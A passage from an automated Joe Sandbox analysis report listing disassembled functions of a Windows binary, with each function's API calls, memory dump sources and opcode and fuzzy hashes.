            • GetCurrentProcessId.KERNEL32 ref: 0102A427
            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0102A435
            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0102A468
            • CloseHandle.KERNEL32(?), ref: 0102A63D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$CloseCountersCurrentHandleOpen
            • String ID:
            • API String ID: 3488606520-0
            • Opcode ID: 58146279b9e8dc3ffd907653a6f04a219f6d67063036cbf9d4e61b4fc0f29154
            • Instruction ID: e0812edc4bc4ed9656e15a5f8943b4874307c2e68e0e2eafcfa102a19dbedf61
            • Opcode Fuzzy Hash: 58146279b9e8dc3ffd907653a6f04a219f6d67063036cbf9d4e61b4fc0f29154
            • Instruction Fuzzy Hash: 17A1B3B16043109FE720DF28C886F2AB7E5AF88714F14885DF59ADB692DB74EC418B91
            Function 0100E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0100DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0100CF22,?), ref: 0100DDFD
              • Part of subcall function 0100DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0100CF22,?), ref: 0100DE16
              • Part of subcall function 0100E199: GetFileAttributesW.KERNEL32(?,0100CF95), ref: 0100E19A
            • lstrcmpiW.KERNEL32(?,?), ref: 0100E473
            • MoveFileW.KERNEL32(?,?), ref: 0100E4AC
            • _wcslen.LIBCMT ref: 0100E5EB
            • _wcslen.LIBCMT ref: 0100E603
            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0100E650
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
            • String ID:
            • API String ID: 3183298772-0
            • Opcode ID: 21b060f4792350afe8fa5b10b971a66eb38061045ef5af037074a75aed74e089
            • Instruction ID: 37458c936d5ed4ba6ed8c7ce0463c44c87aca0936c07a8c02c67e03ae2dfd58c
            • Opcode Fuzzy Hash: 21b060f4792350afe8fa5b10b971a66eb38061045ef5af037074a75aed74e089
            • Instruction Fuzzy Hash: CC5181B24083455BE765EBA4DC819DFB7DCAF85340F004D2EE6C9D3181EF79A2888766
            Function 0102B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 0102C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0102B6AE,?,?), ref: 0102C9B5
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102C9F1
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA68
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA9E
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0102BAA5
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102BB00
            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0102BB63
            • RegCloseKey.ADVAPI32(?,?), ref: 0102BBA6
            • RegCloseKey.ADVAPI32(00000000), ref: 0102BBB3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
            • String ID:
            • API String ID: 826366716-0
            • Opcode ID: 9ef8a75ce1c51b6b14310d5d9b7344b8e3cbf81ca3f9747a709aeb69f010f1ce
            • Instruction ID: a52c48cd771421469c0dd872f470c10778775133c8903ad14a514021069b346d
            • Opcode Fuzzy Hash: 9ef8a75ce1c51b6b14310d5d9b7344b8e3cbf81ca3f9747a709aeb69f010f1ce
            • Instruction Fuzzy Hash: F361E371208241AFD314DF14C890E2ABBE5FF85308F5489ADF5D98B292CB75ED45CB92
            Function 01008BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
            Download Yara Rule
            APIs
            • VariantInit.OLEAUT32(?), ref: 01008BCD
            • VariantClear.OLEAUT32 ref: 01008C3E
            • VariantClear.OLEAUT32 ref: 01008C9D
            • VariantClear.OLEAUT32(?), ref: 01008D10
            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01008D3B
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Variant$Clear$ChangeInitType
            • String ID:
            • API String ID: 4136290138-0
            • Opcode ID: 1bb0e67f9b622f143e87f2a0fb3f96adc5708e5a36b46d8820cb3c9d8218b84d
            • Instruction ID: 0800c360529007a0a2289e1ea76f645fe66ee6e38e92dd0ab41887bf0f648968
            • Opcode Fuzzy Hash: 1bb0e67f9b622f143e87f2a0fb3f96adc5708e5a36b46d8820cb3c9d8218b84d
            • Instruction Fuzzy Hash: 10516AB5A00219EFDB11DF68C884AAABBF8FF89310F05855AE945DB354E734E911CF90
            Function 01018AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
            Download Yara Rule
            APIs
            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 01018BAE
            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 01018BDA
            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 01018C32
            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 01018C57
            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 01018C5F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: PrivateProfile$SectionWrite$String
            • String ID:
            • API String ID: 2832842796-0
            • Opcode ID: e69ec2222da3043835bb40e183ff8e6efa753f57de4dedd74d6870692092ef52
            • Instruction ID: 416904c214014ac2ac936a900ecd2152bd7365a41400f92a761029627ee21bc6
            • Opcode Fuzzy Hash: e69ec2222da3043835bb40e183ff8e6efa753f57de4dedd74d6870692092ef52
            • Instruction Fuzzy Hash: 9B514875A002189FDB11EF64C881E69BBF5FF49314F088099E849AB366CB39ED51DB90
            Function 01028EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 01028F40
            • GetProcAddress.KERNEL32(00000000,?), ref: 01028FD0
            • GetProcAddress.KERNEL32(00000000,00000000), ref: 01028FEC
            • GetProcAddress.KERNEL32(00000000,?), ref: 01029032
            • FreeLibrary.KERNEL32(00000000), ref: 01029052
              • Part of subcall function 00FBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,01011043,?,753CE610), ref: 00FBF6E6
              • Part of subcall function 00FBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00FFFA64,00000000,00000000,?,?,01011043,?,753CE610,?,00FFFA64), ref: 00FBF70D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
            • String ID:
            • API String ID: 666041331-0
            • Opcode ID: b3fb45749861681d3c83fc74267e0546a6e78e9f9e0abf58879f8a468683650e
            • Instruction ID: 74490dff79b5867b1888c8fee7590a91883bec0bff672408efb48b14ba636d83
            • Opcode Fuzzy Hash: b3fb45749861681d3c83fc74267e0546a6e78e9f9e0abf58879f8a468683650e
            • Instruction Fuzzy Hash: 05513678A042159FC751DF58C494CADBBF1FF4A314B0880A9E94AAB362DB35ED85CB90
            Function 01036B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 01036C33
            • SetWindowLongW.USER32(?,000000EC,?), ref: 01036C4A
            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 01036C73
            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0101AB79,00000000,00000000), ref: 01036C98
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 01036CC7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$Long$MessageSendShow
            • String ID:
            • API String ID: 3688381893-0
            • Opcode ID: 69d90c0ba48719d409def93d682cd490d724455f108f6b9a8d5cc31b85640a69
            • Instruction ID: dc61415ff40d446c90dc1fb85af51e63ff55a48b79e9f42dc32494fc9143f8fc
            • Opcode Fuzzy Hash: 69d90c0ba48719d409def93d682cd490d724455f108f6b9a8d5cc31b85640a69
            • Instruction Fuzzy Hash: 0441A135A10108BFEB248F68C954BB97FADEB89350F040269E995A72D1C372AE41CA50
            Function 00FD2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free
            • String ID:
            • API String ID: 269201875-0
            • Opcode ID: 51ad3275fae7c6ebabb615ed46a38375abdcd8e24364f2c45c10346879e68678
            • Instruction ID: 17d656b905666aa8c9e78763b056bcdf2da6886ea9e69e40cb6b8cacb978ada6
            • Opcode Fuzzy Hash: 51ad3275fae7c6ebabb615ed46a38375abdcd8e24364f2c45c10346879e68678
            • Instruction Fuzzy Hash: 8341E432E00200AFDB20DF78C981A5DB3B6EF99324F1985AAE515EB351D731ED01EB80
            Function 00FB912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
            Download Yara Rule
            APIs
            • GetCursorPos.USER32(?), ref: 00FB9141
            • ScreenToClient.USER32(00000000,?), ref: 00FB915E
            • GetAsyncKeyState.USER32(00000001), ref: 00FB9183
            • GetAsyncKeyState.USER32(00000002), ref: 00FB919D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AsyncState$ClientCursorScreen
            • String ID:
            • API String ID: 4210589936-0
            • Opcode ID: 3e31d9b242f0204e5a64dcedd15617b5c6ecb1f4016be985a9e6e5a31f1d64ce
            • Instruction ID: f781f664a37f93b7067f87f62e56731b5135796b5cadffaea473f4a453b73b7a
            • Opcode Fuzzy Hash: 3e31d9b242f0204e5a64dcedd15617b5c6ecb1f4016be985a9e6e5a31f1d64ce
            • Instruction Fuzzy Hash: 3B417F31A0860AFBDF15AF69C844BFEB774FF05320F208219E565A62E0C7745954EF51
            Function 01013874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
            Download Yara Rule
            APIs
            • GetInputState.USER32 ref: 010138CB
            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 01013922
            • TranslateMessage.USER32(?), ref: 0101394B
            • DispatchMessageW.USER32(?), ref: 01013955
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01013966
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
            • String ID:
            • API String ID: 2256411358-0
            • Opcode ID: f8258a6ad60c6879f209888c2beb6cf52e5fe62887178d766dbbf6034d33dbf2
            • Instruction ID: 560812829c9146edaf58e7f9e9f17fb7dd08082868ee2fb306ba1985da423327
            • Opcode Fuzzy Hash: f8258a6ad60c6879f209888c2beb6cf52e5fe62887178d766dbbf6034d33dbf2
            • Instruction Fuzzy Hash: B931C470904342AEFB75CB389449BB63BE9BB05324F0405AAD5E2DA0C9E37E9085CB11
            Function 01001901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
            Download Yara Rule
            APIs
            • GetWindowRect.USER32(?,?), ref: 01001915
            • PostMessageW.USER32(00000001,00000201,00000001), ref: 010019C1
            • Sleep.KERNEL32(00000000,?,?,?), ref: 010019C9
            • PostMessageW.USER32(00000001,00000202,00000000), ref: 010019DA
            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 010019E2
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessagePostSleep$RectWindow
            • String ID:
            • API String ID: 3382505437-0
            • Opcode ID: 4116ca7d0fc71612875e1d78e20582a649ee8b08bcdc806ab8484fd1d836147a
            • Instruction ID: 2c02ee62e87f6d287efec6726a8a75f69a9a6c932d29670700adcc808b0a7cf3
            • Opcode Fuzzy Hash: 4116ca7d0fc71612875e1d78e20582a649ee8b08bcdc806ab8484fd1d836147a
            • Instruction Fuzzy Hash: 8331D171A00219EFEB11CFACC988ADE3BB5EB05315F004269F9A1E72C1C770E944DB90
            Function 01035706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01035745
            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0103579D
            • _wcslen.LIBCMT ref: 010357AF
            • _wcslen.LIBCMT ref: 010357BA
            • SendMessageW.USER32(?,00001002,00000000,?), ref: 01035816
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$_wcslen
            • String ID:
            • API String ID: 763830540-0
            • Opcode ID: 87678599ec56947668651229a5252017be3a3c7bc8e44dd26b33416bbe368c6e
            • Instruction ID: 41fb785b607d8b5f15b28d721e7139bcf5f7c5ed930a617e187e1dc190fecc2e
            • Opcode Fuzzy Hash: 87678599ec56947668651229a5252017be3a3c7bc8e44dd26b33416bbe368c6e
            • Instruction Fuzzy Hash: 3821B6719002189AEB618F64DC85AEE7BBCFF85324F008256EA99EB1D0D7749585CF50
            Function 01020930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
            Download Yara Rule
            APIs
            • IsWindow.USER32(00000000), ref: 01020951
            • GetForegroundWindow.USER32 ref: 01020968
            • GetDC.USER32(00000000), ref: 010209A4
            • GetPixel.GDI32(00000000,?,00000003), ref: 010209B0
            • ReleaseDC.USER32(00000000,00000003), ref: 010209E8
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$ForegroundPixelRelease
            • String ID:
            • API String ID: 4156661090-0
            • Opcode ID: b4a52d7162a4513a6c9845afd81d8251112e7afc9bc5bb0842144f2c63880a81
            • Instruction ID: b59d212037729542f2c43073af34bcc073ed705f4f118e382414f571171b146f
            • Opcode Fuzzy Hash: b4a52d7162a4513a6c9845afd81d8251112e7afc9bc5bb0842144f2c63880a81
            • Instruction Fuzzy Hash: 49218175A00214AFE714EF65C984AAEBBF9EF49700F048069E98AE7755CB35AC04DB50
            Function 00FDCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
            Download Yara Rule
            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 00FDCDC6
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FDCDE9
              • Part of subcall function 00FD3820: RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FDCE0F
            • _free.LIBCMT ref: 00FDCE22
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FDCE31
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
            • String ID:
            • API String ID: 336800556-0
            • Opcode ID: 48385c7c5985c7c3d0b85bc86eda187f580bcf7e31d6f67f422713967c84c8cf
            • Instruction ID: dc2ce22beb03b3a7edc6c6df154f3dd539b9ee1082e12a0a9e789e0356d96853
            • Opcode Fuzzy Hash: 48385c7c5985c7c3d0b85bc86eda187f580bcf7e31d6f67f422713967c84c8cf
            • Instruction Fuzzy Hash: C20188B3A022167F372116BA6C48D7BBA6EDEC6BA1319012BF905D7304DA658D01F2F0
            Function 00FB9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
            Download Yara Rule
            APIs
            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB9693
            • SelectObject.GDI32(?,00000000), ref: 00FB96A2
            • BeginPath.GDI32(?), ref: 00FB96B9
            • SelectObject.GDI32(?,00000000), ref: 00FB96E2
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ObjectSelect$BeginCreatePath
            • String ID:
            • API String ID: 3225163088-0
            • Opcode ID: e7520c9fe180ea11d1e8a5022b6526e284f726174e660c530785a601a595971d
            • Instruction ID: fb05f45f870f93944cb4a471ec9004eba8961329255d533d2eac4f240857a9c1
            • Opcode Fuzzy Hash: e7520c9fe180ea11d1e8a5022b6526e284f726174e660c530785a601a595971d
            • Instruction Fuzzy Hash: C321D431C16305EFDB209F25DD087E97BB9BB11321F100216F590B60D8D3BA5882EF90
            Function 01005711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _memcmp
            • String ID:
            • API String ID: 2931989736-0
            • Opcode ID: b0ac7b3d7c41986fcac26142bc9f3731012a65f895bbb99c78b0e996aeda64f0
            • Instruction ID: 3f8989cfefc6c93245364cba0cb4e5fa1d5c876646f6e4be6c3e2b9037d1af7b
            • Opcode Fuzzy Hash: b0ac7b3d7c41986fcac26142bc9f3731012a65f895bbb99c78b0e996aeda64f0
            • Instruction Fuzzy Hash: 0801B9A1681206BBF71A55156F42FBB739CBF51398F004018FD4C9E282F764EE20A6A1
            Function 00FD2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(?,?,?,00FCF2DE,00FD3863,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6), ref: 00FD2DFD
            • _free.LIBCMT ref: 00FD2E32
            • _free.LIBCMT ref: 00FD2E59
            • SetLastError.KERNEL32(00000000,00FA1129), ref: 00FD2E66
            • SetLastError.KERNEL32(00000000,00FA1129), ref: 00FD2E6F
            Memory Dump Source
